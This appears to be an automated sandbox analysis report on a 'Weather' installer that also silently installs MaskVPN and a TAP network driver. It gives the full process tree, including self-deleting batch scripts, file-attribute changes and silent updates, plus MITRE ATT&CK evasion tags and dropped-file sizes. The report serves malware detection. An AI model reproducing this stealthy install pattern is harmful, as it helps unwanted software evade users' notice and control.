C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default3⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--anbfs"4⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exeC:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x204,0x208,0x20c,0x1d0,0x210,0x7ff9a8f89ec0,0x7ff9a8f89ed0,0x7ff9a8f89ee05⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exeC:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ff70a204e60,0x7ff70a204e70,0x7ff70a204e806⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1332,7798906545155105316,1180373487231683420,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3004_1717571634" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1604 /prefetch:25⤵
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1332,7798906545155105316,1180373487231683420,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3004_1717571634" --mojo-platform-channel-handle=1920 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1332,7798906545155105316,1180373487231683420,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3004_1717571634" --mojo-platform-channel-handle=2208 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1332,7798906545155105316,1180373487231683420,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3004_1717571634" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2592 /prefetch:15⤵
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1332,7798906545155105316,1180373487231683420,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3004_1717571634" --mojo-platform-channel-handle=2856 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1332,7798906545155105316,1180373487231683420,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3004_1717571634" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1600 /prefetch:25⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXE7429.bat" "3⤵
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\System32\timeout.exe 54⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\System32\timeout.exe 54⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXE7429.bat"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXE7429.bat" "4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" cls"4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXE73EA.bat" "3⤵
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1\AIPACK~1.EXE"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\System32\timeout.exe 54⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXE73EA.bat"4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXE73EA.bat" "4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" cls"4⤵
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\a32d4be1475b4b8a92a86517dba605ac /t 0 /p 58921⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{08a45ac8-6f9a-4a47-a4c8-221b75165a7d}\oemvista.inf" "9" "4d14a44ff" "0000000000000124" "WinSta0\Default" "000000000000016C" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000124"2⤵
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
Network
MITRE ATT&CK Enterprise v6
Defense Evasion
Hidden Files and Directories
1Install Root Certificate
1Modify Registry
3Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
248KB
-
Filesize
17.8MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.5MB
-
Filesize
932KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
9.6MB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
44KB
-
Filesize
4KB
-
Filesize
172KB
-
Filesize
28KB
-
Filesize
8KB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
128KB
-
Filesize
7.0MB
-
Filesize
7.0MB
-
Filesize
128KB
-
Filesize
7.0MB
-
Filesize
80KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
3.5MB
-
Filesize
3.5MB
-
Filesize
4KB
-
Filesize
9.9MB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
292KB
-
Filesize
292KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
200KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
236KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
11.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
136KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
104KB
-
Filesize
4KB
-
Filesize
140KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
40KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
64KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
8KB
-
Filesize
9.6MB
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
72KB
-
Filesize
728KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
172KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
304KB
-
Filesize
320KB
-
Filesize
4KB
-
Filesize
32KB
-
Filesize
48KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.9MB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
9.9MB
-
Filesize
8KB
-
Filesize
9.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
672KB
-
Filesize
16.7MB
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
272KB
-
Filesize
52KB
-
Filesize
88KB
-
Filesize
4KB
-
Filesize
276KB
-
Filesize
4KB
-
Filesize
24KB
-
Filesize
204KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
9.1MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
9.1MB
-
Filesize
9.0MB
-
Filesize
8KB
-
Filesize
9.6MB
-
Filesize
200KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
38.0MB
-
Filesize
38.0MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
204KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
612KB
-
Filesize
600KB
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
9.9MB
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
9.9MB
-
Filesize
8KB
-
Filesize
16.7MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
17.8MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
17.8MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
16.7MB